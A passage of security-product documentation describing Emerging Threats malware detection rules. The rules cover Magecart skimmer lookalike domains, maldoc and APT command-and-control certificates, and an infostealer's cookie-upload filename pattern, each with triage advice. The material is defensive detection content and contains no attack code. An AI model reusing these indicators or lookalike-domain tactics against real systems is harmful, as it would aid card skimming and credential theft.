This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is googletagsmanager .website, a Magecart skimmer domain that imitates Google Tag Manager so that the injected script tag blends into page source; the legitimate googletagmanager.com hostname does not trigger this rule. Skimmer scripts run in the visitor's browser on a compromised third-party shopping site, so the alerting host is usually a visitor to that site rather than infected itself.

Recommendation

Review the alert in question. Confirm the exact SNI value, identify the web site the user was visiting when the skimmer domain was contacted, and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart Skimmer Domain (static-zdassets .com in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is static-zdassets .com, a Magecart skimmer domain that imitates the Zendesk static-assets hostname (static.zdassets.com) so that the injected script tag blends into page source; the legitimate hostname does not trigger this rule. Skimmer scripts run in the visitor's browser on a compromised third-party shopping site, so the alerting host is usually a visitor to that site rather than infected itself.

Recommendation

Review the alert in question. Confirm the exact SNI value, identify the web site the user was visiting when the skimmer domain was contacted, and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Magecart/Skimmer - _try_action CnC Domain (cdn-frontend .com in TLS SNI)

Description

This detection identifies web-skimmer activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is cdn-frontend .com, the command-and-control (CnC) domain of the Magecart skimmer variant tracked by its _try_action function name. Skimmer scripts are injected into compromised third-party shopping sites and run in the visitor's browser, so the alerting host is usually a visitor to a compromised site rather than infected itself; what is at risk is the payment card and form data entered on that site.

Recommendation

Review the alert in question. Identify the web site the user was visiting when the skimmer domain was contacted and treat any payment card or credential data entered on that site as exposed. If the connection cannot be attributed to browsing a compromised site, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Maldoc CnC Domain (cloud-documents .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is cloud-documents .com, a command-and-control (CnC) domain contacted by a malicious document (maldoc). The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain, typically after a user opened the document and enabled its content. Malicious actors use maldocs to gain initial access to victim organizations.

Recommendation

Review the alert in question. Confirm the SNI value, identify the process and user that initiated the connection (often an Office application or a script host it spawned), and locate the document and the e-mail or download that delivered it. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Maldoc Domain (travelcrimea .info in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is travelcrimea .info, a domain contacted by a malicious document (maldoc). The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain, typically after a user opened the document and enabled its content. Malicious actors use maldocs to gain initial access to victim organizations.

Recommendation

Review the alert in question. Confirm the SNI value, identify the process and user that initiated the connection (often an Office application or a script host it spawned), and locate the document and the e-mail or download that delivered it. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Cobalt Strike SSL Cert (cdnengine .biz)

Description

This detection identifies command-and-control activity using Rapid7’s Insight Network Sensor. It matches the TLS certificate presented by a server (here one issued for cdnengine .biz) against a certificate known to be used by a malicious Cobalt Strike team server; certificate rules typically key on the subject, issuer or fingerprint. The server certificate is visible to the sensor only when it is sent in the clear (TLS 1.2 and earlier), so a TLS 1.3 session with the same server would not trigger this rule. Cobalt Strike is also widely used by authorized red teams, so a match may reflect an engagement.

Recommendation

Review the alert in question. Identify the destination address, the process and user that connected, and any other hosts connecting to the same server, and check whether an authorized red team or penetration test is under way. If the activity is not authorized, isolate the host, rebuild it from a known, good source, and have the user change their password.

ET MALWARE Observed Malicious Cobalt Strike SSL Cert (setupfastonline .com)

Description

This detection identifies command-and-control activity using Rapid7’s Insight Network Sensor. It matches the TLS certificate presented by a server (here one issued for setupfastonline .com) against a certificate known to be used by a malicious Cobalt Strike team server; certificate rules typically key on the subject, issuer or fingerprint. The server certificate is visible to the sensor only when it is sent in the clear (TLS 1.2 and earlier), so a TLS 1.3 session with the same server would not trigger this rule. Cobalt Strike is also widely used by authorized red teams, so a match may reflect an engagement.

Recommendation

Review the alert in question. Identify the destination address, the process and user that connected, and any other hosts connecting to the same server, and check whether an authorized red team or penetration test is under way. If the activity is not authorized, isolate the host, rebuild it from a known, good source, and have the user change their password.

ET MALWARE Observed Malicious Domain Targeting Minority Groups Domain (unohcr .org in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is unohcr .org, a domain used by a malware campaign targeting minority groups and named to resemble a United Nations agency hostname. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain. Malicious actors use lures such as this to gain access to the devices of targeted individuals and organizations.

Recommendation

Review the alert in question. Confirm the SNI value, identify the process and user that initiated the connection, and locate the e-mail, document or link that led to it. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Domain Targeting Minority Groups (officemodel .org in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is officemodel .org, a domain used by a malware campaign targeting minority groups. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain. Malicious actors use lures such as this to gain access to the devices of targeted individuals and organizations.

Recommendation

Review the alert in question. Confirm the SNI value, identify the process and user that initiated the connection, and locate the e-mail, document or link that led to it. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Domain Targeting Minority Groups (tcahf .org in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. It matches a TLS ClientHello whose Server Name Indication (SNI) is tcahf .org, a domain used by a malware campaign targeting minority groups. The SNI is sent unencrypted, so a match needs no TLS decryption and shows that the host attempted to reach the domain. Malicious actors use lures such as this to gain access to the devices of targeted individuals and organizations.

Recommendation

Review the alert in question. Confirm the SNI value, identify the process and user that initiated the connection, and locate the e-mail, document or link that led to it. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Observed Malicious Filename in Outbound POST Request (Browsers/Cookies/Microsoft Edge_)

Description

This detection identifies data exfiltration using Rapid7’s Insight Network Sensor. It matches an outbound HTTP POST whose body contains the filename string Browsers/Cookies/Microsoft Edge_, the path layout that information-stealer malware uses when it packages harvested browser cookies for upload. A match means session cookies and likely saved credentials from the host are being sent to an attacker; stolen session cookies allow account takeover without the password.

Recommendation

Treat the alert as urgent. Isolate the host, identify the process that made the request and the user logged in, and determine which browser profiles were harvested. Rebuild the host from a known, good source, have the user change their password, and also revoke active sessions and reset credentials for every account used from browsers on the host.

ET MALWARE Observed Malicious SSL Cert (ACBackdoor CnC)

Description

This detection identifies command-and-control activity using Rapid7’s Insight Network Sensor. It matches the TLS certificate presented by a server against a certificate known to be used by ACBackdoor command-and-control (CnC) infrastructure; ACBackdoor is a backdoor with both Linux and Windows variants, and certificate rules typically key on the subject, issuer or fingerprint. The server certificate is visible to the sensor only when it is sent in the clear (TLS 1.2 and earlier), so a TLS 1.3 session with the same server would not trigger this rule.

Recommendation

Review the alert in question. Identify the destination address, the process and user that connected, and any other hosts connecting to the same server. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AgentTesla CnC)

Description

This detection identifies command-and-control activity using Rapid7’s Insight Network Sensor. It matches the TLS certificate presented by a server against a certificate known to be used by AgentTesla command-and-control (CnC) infrastructure; AgentTesla is a .NET information stealer and keylogger, and certificate rules typically key on the subject, issuer or fingerprint. The server certificate is visible to the sensor only when it is sent in the clear (TLS 1.2 and earlier), so a TLS 1.3 session with the same server would not trigger this rule.

Recommendation

Review the alert in question. Identify the destination address, the process and user that connected, and any other hosts connecting to the same server. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source, have the user change their password, and reset any other credentials used on the host, since a stealer will have captured them.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AnubisStealer CnC)

Description

This detection identifies command-and-control activity using Rapid7’s Insight Network Sensor. It matches the TLS certificate presented by a server against a certificate known to be used by Anubis stealer command-and-control (CnC) infrastructure; certificate rules typically key on the subject, issuer or fingerprint. The server certificate is visible to the sensor only when it is sent in the clear (TLS 1.2 and earlier), so a TLS 1.3 session with the same server would not trigger this rule.

Recommendation

Review the alert in question. Identify the destination address, the process and user that connected, and any other hosts connecting to the same server. If the activity is not attributable to a security tool or analyst, rebuild the host from a known, good source, have the user change their password, and reset any other credentials used on the host, since a stealer will have captured them.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT29)

Description

This detection identifies command-and-control activity using Rapid7’s Insight Network Sensor. It matches the TLS certificate presented by a server against a certificate attributed to APT29 infrastructure; certificate rules typically key on the subject, issuer or fingerprint. The server certificate is visible to the sensor only when it is sent in the clear (TLS 1.2 and earlier), so a TLS 1.3 session with the same server would not trigger this rule.

Recommendation

Review the alert in question promptly. Identify the destination address, the process and user that connected, and any other hosts connecting to the same server, and escalate if the match is confirmed, since the actor is a capable, persistent adversary. If the activity is not attributable to a security tool or analyst, isolate the host, rebuild it from a known, good source, and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description

This detection identifies command-and-control activity using Rapid7’s Insight Network Sensor. It matches the TLS certificate presented by a server against a certificate known to be used by APT32 (also known as OceanLotus) command-and-control (CnC) infrastructure; certificate rules typically key on the subject, issuer or fingerprint. The server certificate is visible to the sensor only when it is sent in the clear (TLS 1.2 and earlier), so a TLS 1.3 session with the same server would not trigger this rule.

Recommendation

Review the alert in question promptly. Identify the destination address, the process and user that connected, and any other hosts connecting to the same server, and escalate if the match is confirmed, since the actor is a capable, persistent adversary. If the activity is not attributable to a security tool or analyst, isolate the host, rebuild it from a known, good source, and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to APT32 command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to APT32 command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to APT32 command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to APT32 command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to APT32 command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to APT32 command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to APT32 command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT32 JEShell CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to APT32's JEShell command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT34 CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to APT34 command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (APT MustangPanda CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to Mustang Panda command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AsyncRAT. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AsyncRAT command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AsyncRAT command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AsyncRAT command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AsyncRAT command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AsyncRAT command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AsyncRAT server. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AZORult command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AZORult command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC)

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AZORult command-and-control infrastructure. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC) 2019-11-18

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to AZORult command-and-control infrastructure; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult Cnc Server) 2019-09-27

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-09-30

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-01

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-02

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-03

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-03

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-07

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-08

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-08

Description

This detection fires when Rapid7's Insight Network Sensor observes a TLS/SSL certificate that Emerging Threats has attributed to an AZORult command-and-control server; the date in the rule name is the date the indicator was added to the Emerging Threats rule set. The match is on attributes of the certificate presented in the handshake (typically the subject or issuer fields, or the certificate fingerprint), not on the encrypted payload, so the server side of the session is identified without decrypting the traffic.

Recommendation

Review the alert in question: confirm that the destination and the certificate attributes recorded in the alert correspond to the indicator rather than to a shared or reissued certificate, then check the source host for the malware or actor named in the alert. If compromise is confirmed, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Observed Malicious SSL Cert (AZORult CnC Server) 2019-10-08

Description

